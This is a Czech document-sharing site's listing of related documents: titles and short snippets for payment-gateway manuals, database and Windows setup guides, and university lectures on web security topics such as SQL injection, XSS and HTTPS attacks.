Manuál pro implementaci služby PLATBA 24. Datum: 22. října 2015 Verze: 1.50 Manuál pro implementaci služby PLATBA 24 Datum: 22. října 2015 Verze: 1.50 1 Úvodní informace ke službě PLATBA 24... 3 1.1 Obecný popis služby... 3 1.2 Administrativní předpoklady k využití služby PLATBA

Více

EPLAN Electric P8 2.7 s databázemi na SQL serveru

EPLAN Electric P8 2.7 s databázemi na SQL serveru EPLAN Electric P8 2.7 s databázemi na SQL serveru EPLAN Electric P8 2.7 k dispozici pouze ve verzi 64bit. EPLAN Electric P8 využívá k ukládání některých dat databáze. Artikly, překladový slovník 1 ) a

Více

Desktop systémy Microsoft Windows

Desktop systémy Microsoft Windows Desktop systémy Microsoft Windows IW1/XMW1 2011/2012 Jan Fiedor ifiedor@fit.vutbr.cz Fakulta Informačních Technologií Vysoké Učení Technické v Brně Božetěchova 2, 612 66 Brno Revize 21.11.2011 21.11.2011

Více

4. lekce Přístup k databázi z vyššího programovacího jazyka

4. lekce Přístup k databázi z vyššího programovacího jazyka 4. lekce Přístup k databázi z vyššího programovacího jazyka Studijní cíl Tento blok popisuje základní principy přístupu k databázi z vyššího programovacího jazyka. Doba nutná k nastudování 2-3 hodiny Průvodce

Více

PLATBY KARTOU NA INTERNETU

PLATBY KARTOU NA INTERNETU PLATBY KARTOU NA INTERNETU Chcete rychle, pohodlně a bezpečně nakupovat z pohodlí domova či kanceláře? Není nic jednoduššího, než nakupovat přes internet kartou. Karta šetří Váš čas i peníze S kartou můžete

Více

Zabezpečení proti SQL injection

Zabezpečení proti SQL injection Zabezpečení proti SQL injection ESO9 intranet a.s. Zpracoval: Tomáš Urych U Mlýna 2305/22, 141 Praha 4 Záběhlice Dne: 19.9.2012 tel.: +420 585 203 370-2 e-mail: info@eso9.cz Revize: Urych Tomáš www.eso9.cz

Více

ISMS. Autentizace ve WiFi sítích. V Brně dne 5. a 12. prosince 2013

ISMS. Autentizace ve WiFi sítích. V Brně dne 5. a 12. prosince 2013 ISMS Případová studie Autentizace ve WiFi sítích V Brně dne 5. a 12. prosince 2013 Pojmy Podnikové WiFi sítě Autentizace uživatelů dle standardu 802.1X Hlavní výhodou nasazení tohoto standardu je pohodlná

Více

Internet cvičení. ZS 2009/10, Cvičení 4.,15.12.2009 PHP. Tomáš Pop. DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz

Internet cvičení. ZS 2009/10, Cvičení 4.,15.12.2009 PHP. Tomáš Pop. DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz Internet cvičení ZS 2009/10, Cvičení 4.,15.12.2009 PHP Tomáš Pop DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz CHARLES UNIVERSITY PRAGUE Faculty of Mathematics and Physics Generování tabulky

Více

Dell SonicWALL. Security tips & tricks. Jan Ježek business communication s.r.o.

Dell SonicWALL. Security tips & tricks. Jan Ježek business communication s.r.o. Dell SonicWALL Security tips & tricks Jan Ježek business communication s.r.o. Příklady bezpečnostních rizik Pasivní útoky iniciované zvenku Virus attacks, Malware & Spyware SPAM, Phishing Exploit (OS,

Více

Útoky na HTTPS. PV210 - Bezpečnostní analýza síťového provozu. Pavel Čeleda, Radek Krejčí

Útoky na HTTPS. PV210 - Bezpečnostní analýza síťového provozu. Pavel Čeleda, Radek Krejčí Útoky na HTTPS PV210 - Bezpečnostní analýza síťového provozu Pavel Čeleda, Radek Krejčí Ústav výpočetní techniky Masarykova univerzita celeda@ics.muni.cz Brno, 5. listopadu 2014 Pavel Čeleda, Radek Krejčí

Více

Užitečné odkazy: http://en.wikipedia.org/wiki/list_of_http_status_codes

Užitečné odkazy: http://en.wikipedia.org/wiki/list_of_http_status_codes Užitečné odkazy: http://en.wikipedia.org/wiki/list_of_http_status_codes Metoda PUT protokolu HTTP slouží k dotazu na možnou komunikaci se serverem na konkrétní URL analýze způsobu připojení zjištění typu

Více

Platební systém XPAY [www.xpay.cz]

Platební systém XPAY [www.xpay.cz] Platební systém XPAY [www.xpay.cz] implementace přenosu informace o doručení SMS verze 166 / 1.3.2012 1 Obsah 1 Implementace platebního systému 3 1.1 Nároky platebního systému na klienta 3 1.2 Komunikace

Více

Inovace bakalářského studijního oboru Aplikovaná chemie http://aplchem.upol.cz

Inovace bakalářského studijního oboru Aplikovaná chemie http://aplchem.upol.cz http://aplchem.upol.cz CZ.1.07/2.2.00/15.0247 Tento projekt je spolufinancován Evropským sociálním fondem a státním rozpočtem České republiky. Internet a zdroje Elektronická pošta a její správa, bezpečnost

Více

ISSS Mgr. Pavel Hejl, CSc. T- SOFT spol. s r.o.

ISSS Mgr. Pavel Hejl, CSc. T- SOFT spol. s r.o. Bezpečnost ICT ISSS 2009 Mgr. Pavel Hejl, CSc. T- SOFT spol. s r.o. 1 Obsah PKI a bezpečná autentizace Bezpečná komunikace Czech POINT Závěr 2 PKI a bezpečná autentizace 3 Bezpečná komunikace 4 Smart tokeny

Více

VZOROVÝ STIPENDIJNÍ TEST Z INFORMAČNÍCH TECHNOLOGIÍ

VZOROVÝ STIPENDIJNÍ TEST Z INFORMAČNÍCH TECHNOLOGIÍ VZOROVÝ STIPENDIJNÍ TEST Z INFORMAČNÍCH TECHNOLOGIÍ 1. Dědičnost v OOP umožňuje: a) dědit vlastnosti od jiných tříd a dále je rozšiřovat b) dědit vlastnosti od jiných tříd, rozšiřovat lze jen atributy

Více

Pánem World Wide Webu! aneb povídání o chybě hloupé tak, až to bolí

Pánem World Wide Webu! aneb povídání o chybě hloupé tak, až to bolí Pánem World Wide Webu! aneb povídání o chybě hloupé tak, až to bolí Roman Kümmel r.kummel@hacker-consulting.cz WFT?#!$... Session management HTTP je bezstavový protokol Server si nepamatuje předchozí kroky

Více

Monitorování a audit databází v reálném čase. Ing. Jan Musil IBM Česká republika

Monitorování a audit databází v reálném čase. Ing. Jan Musil IBM Česká republika Monitorování a audit databází v reálném čase Ing. Jan Musil IBM Česká republika Jsou naše data chráněna proti zneužití? Ano, pokud... Nepoužitelné Steve Mandel, Hidden Valley Observatory http://apod.nasa.gov/apod/ap010809.html

Více

Tvorba WWW stránek. přehled technologií používaných na webu principy jednotlivých technologií a možnosti jejich vzájemného kombinování

Tvorba WWW stránek. přehled technologií používaných na webu principy jednotlivých technologií a možnosti jejich vzájemného kombinování Tvorba WWW stránek přehled technologií používaných na webu principy jednotlivých technologií a možnosti jejich vzájemného kombinování HTML/XHTML kaskádové styly PHP spolupráce PHP s databázemi Technologie

Více

Instrukce pro vzdálené připojení do učebny 39d

Instrukce pro vzdálené připojení do učebny 39d Instrukce pro vzdálené připojení do učebny 39d Každá skupina má k dispozici jedno sdílené připojení, prostřednictvím kterého se může vzdáleně připojit do učebny 39d a pracovat na svých semestrálních projektech

Více

1. Administrace služby Bezpečný Internet přes webovou aplikaci WebCare GTS

1. Administrace služby Bezpečný Internet přes webovou aplikaci WebCare GTS 1. Administrace služby Bezpečný Internet přes webovou aplikaci WebCare GTS Pro přístup do administrace služby GTS Bezpečný Internet používejte zákaznický WebCare GTS Czech, který je přístupny přes webové

Více

Vývoj internetových aplikací. 9. Útoky na internetové aplikace. a možná obrana proti nim

Vývoj internetových aplikací. 9. Útoky na internetové aplikace. a možná obrana proti nim Vývoj internetových aplikací 9. Útoky na internetové aplikace a možná obrana proti nim Tomáš Tureček, Jiří Suchora, VŠB-TU Ostrava, FEI, 456, 2009 Obsah přednášky Úvod PHP injekce SQL injekce XSS útoky

Více

Microsoft Windows Server System

Microsoft Windows Server System Microsoft Windows Server System Uživatelský autentikační systém od společnosti truconnexion komplexně řeší otázku bezpečnosti interních počítačových systémů ebanky, a.s. Přehled Země: Česká republika Odvětví:

Více

Jak efektivně ochránit Informix?

Jak efektivně ochránit Informix? Jak efektivně ochránit Informix? Jan Musil jan_musil@cz.ibm.com Informix CEE Technical Sales Information Management Jsou Vaše data chráněna proti zneužití? 2 Ano, pokud... 3 Nepoužitelné Steve Mandel,

Více

Část IV - Bezpečnost 21. Kapitola 19 Bezpečnostní model ASP.NET 23

Část IV - Bezpečnost 21. Kapitola 19 Bezpečnostní model ASP.NET 23 5 Obsah O autorech 15 O odborných korektorech 15 Úvod 16 Rozdělení knihy 16 Komu je tato kniha určena? 18 Co potřebujete, abyste mohli pracovat s touto knihou? 18 Sdělte nám svůj názor 18 Zdrojové kódy

Více

4. Nastavení programu

4. Nastavení programu 4. Nastavení programu Tato kapitola má za úkol Vás seznámit s možnostmi uživatelského nastavení programu Podání PVS. Formulář "Nastavení" naleznete v části programu "Nastavení a ostatní", otevřete jej

Více

DNSSEC Validátor - doplněk prohlížečů proti podvržení domény

DNSSEC Validátor - doplněk prohlížečů proti podvržení domény DNSSEC Validátor - doplněk prohlížečů proti podvržení domény CZ.NIC z.s.p.o. Martin Straka / martin.straka@nic.cz Konference Internet a Technologie 12 24.11.2012 1 Obsah prezentace Stručný úvod do DNS

Více

APS Administrator.OP

APS Administrator.OP APS Administrator.OP Rozšiřující webový modul pro APS Administrator Přehled přítomnosti osob v oblastech a místnostech Instalační a uživatelská příručka 2004 2013,TECH FASS s.r.o., Věštínská 1611/19, Praha,

Více

Implementace LMS MOODLE. na Windows 2003 Server a IIS 6.0

Implementace LMS MOODLE. na Windows 2003 Server a IIS 6.0 Implementace LMS MOODLE na Windows 2003 Server a IIS 6.0 Obsah 1 ÚVOD... 3 1.1 Instalace PHP... 3 1.1.1 Nastavení práv k adresáři PHP... 3 1.1.2 Úprava souboru php.ini... 4 1.1.3 Proměnné prostředí...

Více

Postup instalace síťové verze Mount Blue

Postup instalace síťové verze Mount Blue Postup instalace síťové verze Mount Blue Instalace na serveru 1. Stáhněte si instalační balíček pro server ze stránek Mount Blue na adrese: http://www.mountblue.cz/download/mountblue-server-setup.exe 2.

Více

Služba Rychlý výpis umožňuje on-line službám získat elektronický a snadno zpracovatelný výpis z bankovního účtu klienta.

Služba Rychlý výpis umožňuje on-line službám získat elektronický a snadno zpracovatelný výpis z bankovního účtu klienta. Rychlý výpis Úvod Služba Rychlý výpis umožňuje on-line službám získat elektronický a snadno zpracovatelný výpis z bankovního účtu klienta. Zákazník služby Mezi očekávané zákazníky služby Rychlý výpis patří:

Více

Instalační manuál aplikace

Instalační manuál aplikace Instalační manuál aplikace Informační systém WAK BCM je softwarovým produktem, jehož nástroje umožňují podporu procesního řízení. Systém je spolufinancován v rámci Programu bezpečnostního výzkumu České

Více

Tvorba informačních systémů

Tvorba informačních systémů Tvorba informačních systémů Michal Krátký 1, Miroslav Beneš 1 1 Katedra informatiky VŠB Technická univerzita Ostrava Tvorba informačních systémů, 2005/2006 c 2006 Michal Krátký, Miroslav Beneš Tvorba informačních

Více

STUDIJNÍ MATERIÁL PRO TECHNICKOU CERTIFIKACI ESET Business Edition, ESET Remote Administrator

STUDIJNÍ MATERIÁL PRO TECHNICKOU CERTIFIKACI ESET Business Edition, ESET Remote Administrator STUDIJNÍ MATERIÁL PRO TECHNICKOU CERTIFIKACI ESET Business Edition, ESET Remote Administrator Vzdálená správa... 2 ESET Remote Administrator Server (ERAS)... 2 Licenční klíč soubor *.LIC... 2 ESET Remote

Více

Vazba ESO9 na MS Outlook a MS Exchange

Vazba ESO9 na MS Outlook a MS Exchange Vazba ESO9 na MS Outlook a MS Exchange Zpracoval: Kočíbová Jana U Mlýna 2305/22, 141 Praha 4 Záběhlice Dne: 24.6.2011 tel.: +420 585 203 370-2 e-mail: info@eso9.cz Revize: Urych Tomáš www.eso9.cz Dne:

Více

Univerzita Palackého v Olomouci Radek Janoštík (Univerzita Palackého v Olomouci) Základy programování 4 - C# 10.4.

Univerzita Palackého v Olomouci Radek Janoštík (Univerzita Palackého v Olomouci) Základy programování 4 - C# 10.4. Základy programování 4 - C# - 9. cvičení Radek Janoštík Univerzita Palackého v Olomouci 10.4.2017 Radek Janoštík (Univerzita Palackého v Olomouci) Základy programování 4 - C# 10.4.2017 1 / 13 Reakce na

Více

Bezpečnost webových aplikací

Bezpečnost webových aplikací Bezpečnost webových aplikací Security of web applications Lukáš Zemek Bakalářská práce 2012 *** naskenované zadání str. 1 *** *** nascannované zadání str. 2 *** UTB ve Zlíně, Fakulta aplikované informatiky,

Více

BRICSCAD V15. Licencování

BRICSCAD V15. Licencování BRICSCAD V15 Licencování Protea spol. s r.o. Makovského 1339/16 236 00 Praha 6 - Řepy tel.: 235 316 232, 235 316 237 fax: 235 316 038 e-mail: obchod@protea.cz web: www.protea.cz Copyright Protea spol.

Více

1. POSTUP INSTALACE A KONTROLA NASTAVENÍ MICROSOFT SQL SERVERU 2005 EXPRESS:

1. POSTUP INSTALACE A KONTROLA NASTAVENÍ MICROSOFT SQL SERVERU 2005 EXPRESS: 1. POSTUP INSTALACE A KONTROLA NASTAVENÍ MICROSOFT SQL SERVERU 2005 EXPRESS: Ověřte prosím následující nastavení (tento postup se může nepatrně lišit podle operačního systému Vašeho pc). Pro lepší viditelnost

Více

TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A SERVERY

TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A SERVERY ANTIVIRUS JE MRTEV TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A 14. listopadu 2017 SERVERY Jakub Jiříček, CISSP, CNSE jjiricek@paloaltonetworks.com Srovnání účinnosti tradiční a nové ochrany koncových

Více

GDPR A INFORMAČNÍ SYSTÉM. Nadežda Andrejčíková Libor Piškula

GDPR A INFORMAČNÍ SYSTÉM. Nadežda Andrejčíková Libor Piškula GDPR A INFORMAČNÍ SYSTÉM Nadežda Andrejčíková Libor Piškula GDPR a informační systém Obsah: 1. Principy ochrany 2. Legitimnost zpracování osobních údajů 3. Praktické dopady GDPR 4. Technologické aspekty

Více

PŘIPOJENÍ KE VZDÁLENÉ PLOŠE Z POČÍTAČE APPLE

PŘIPOJENÍ KE VZDÁLENÉ PLOŠE Z POČÍTAČE APPLE PŘIPOJENÍ KE VZDÁLENÉ PLOŠE Z POČÍTAČE APPLE Windows Server 2008 Windows Server 2012 ipodnik cloud ipodnik pro Vás provozuje: BIZ-ONE EU s.r.o. Jiráskova 306 252 25 Jinočany, Praha Západ Web: www.ipodnik.cz

Více

Práce s e-mailovými schránkami v síti Selfnet

Práce s e-mailovými schránkami v síti Selfnet Práce s e-mailovými schránkami v síti Selfnet Obsah návodu Základní informace k nastavení schránky selfnet.cz...2 Doporučené parametry nastavení e-mailového klienta...2 Základní informace k nastavení e-mailové

Více

VYSOKÁ ŠKOLA POLYTECHNICKÁ JIHLAVA Katedra technických studií Obor Aplikovaná informatika. Analýza bezpečnosti webových stránek veřejné správy v kraji

VYSOKÁ ŠKOLA POLYTECHNICKÁ JIHLAVA Katedra technických studií Obor Aplikovaná informatika. Analýza bezpečnosti webových stránek veřejné správy v kraji VYSOKÁ ŠKOLA POLYTECHNICKÁ JIHLAVA Katedra technických studií Obor Aplikovaná informatika Analýza bezpečnosti webových stránek veřejné správy v kraji bakalářská práce Autor: Filip Svoboda Vedoucí práce:

Více

Bezpečnostní aspekty informačních a komunikačních systémů PS2-1

Bezpečnostní aspekty informačních a komunikačních systémů PS2-1 Bezpečnost informací BI Ing. Jindřich Kodl, CSc. Bezpečnostní aspekty informačních a komunikačních systémů PS2-1 1 Literatura Doseděl T.: Počítačová bezpečnost a ochrana dat, Computer Press, 2004 Časopis

Více

Desktop systémy Microsoft Windows

Desktop systémy Microsoft Windows Desktop systémy Microsoft Windows IW1/XMW1 2011/2012 Jan Fiedor ifiedor@fit.vutbr.cz Fakulta Informačních Technologií Vysoké Učení Technické v Brně Božetěchova 2, 612 66 Brno Revize 11.12.2011 11.12.2011

Více

Czech Nature Photo Návod

Czech Nature Photo Návod Czech Nature Photo Návod Tento návod vás provede všemi úkony nutnými pro úspěšné přihlášení vašich fotogra?ií do soutěže Czech Nature Photo. Pokud narazíte na problém, který není v tomto dokumentu podchycen,

Více

1 Tabulky Příklad 3 Access 2010

1 Tabulky Příklad 3 Access 2010 TÉMA: Vytvoření tabulky v návrhovém zobrazení Pro společnost Naše zahrada je třeba vytvořit databázi pro evidenci objednávek o konkrétní struktuře tabulek. Do databáze je potřeba ještě přidat tabulku Platby,

Více

Jazyk C# - přístup k datům

Jazyk C# - přístup k datům Jazyk C# - přístup k datům Katedra softwarového inženýrství Fakulta informačních technologií České vysoké učení technické v Praze Pavel Štěpán, 2011 Data Reader BI-PCS Evropský sociální fond Praha & EU:

Více

1. Úvod do Ajaxu 11. Jak Ajax funguje? 13

1. Úvod do Ajaxu 11. Jak Ajax funguje? 13 Obsah Úvodem 9 1. Úvod do Ajaxu 11 Jak Ajax funguje? 13 Popis 13 Ukázky 13 Jaké jsou možnosti tvorby interaktivních webových aplikací? 15 Co je třeba znát? 16 Jak fungují technologie Ajaxu 16 Jak funguje

Více

Bezpečnost. Michal Dočekal

Bezpečnost. Michal Dočekal Michal Dočekal 2011 Právní doložka Právní doložka autor není právník autor neručí za pravdivost uvedených informací autor neručí za jakékoliv případné škody způsobené uvedenými informaci Osnova 1 Bezpečnost

Více

Úvod - Podniková informační bezpečnost PS1-2

Úvod - Podniková informační bezpečnost PS1-2 VŠFS; Aplikovaná informatika - 2006/2007 1 Bezpečnost informací BI Ing. Jindřich Kodl, CSc. Úvod - Podniková informační bezpečnost PS1-2 VŠFS; Aplikovaná informatika - 2006/2007 2 Literatura Kovacich G.L.:

Více

Zabezpečení mobilních bankovnictví

Zabezpečení mobilních bankovnictví Konference Security 2015 Zabezpečení mobilních bankovnictví Petr Dvořák CEO, Lime - HighTech Solutions s.r.o. petr@lime-company.eu Obsah Vlastnosti mobilních zařízení. Architektura mobilního bankovnictví.

Více

1. Instalace MySQL Serveru...2. 2. Konfigurace MySql Serveru...2. 3. Vytvoření struktury databáze...3

1. Instalace MySQL Serveru...2. 2. Konfigurace MySql Serveru...2. 3. Vytvoření struktury databáze...3 Obsah 1. Instalace MySQL Serveru...2 2. Konfigurace MySql Serveru...2 3. Vytvoření struktury databáze...3 4. Instalace Watchdog na klientských stanicích...4 5. Watchdog Viewer...6 Nastavení připojení k

Více

FIREMNÍ CERTIFIKÁT V APLIKACI PŘÍMÝ KANÁL NÁVOD PRO KLIENTY

FIREMNÍ CERTIFIKÁT V APLIKACI PŘÍMÝ KANÁL NÁVOD PRO KLIENTY FIREMNÍ CERTIFIKÁT V APLIKACI PŘÍMÝ KANÁL NÁVOD PRO KLIENTY 1. POUŽITÍ FIREMNÍHO CERTIFIKÁTU 1.1 Stručný popis Firemní certifikát je nový typ certifikátu, který Vám umožní zrychlit a zjednodušit Vaši práci.

Více

Desktop systémy Microsoft Windows

Desktop systémy Microsoft Windows Desktop systémy Microsoft Windows IW1/XMW1 2016/2017 Jan Fiedor ifiedor@fit.vutbr.cz Fakulta Informačních Technologií Vysoké Učení Technické v Brně Božetěchova 2, 612 66 Brno Revize 8. 11. 2016 8. 11.

Více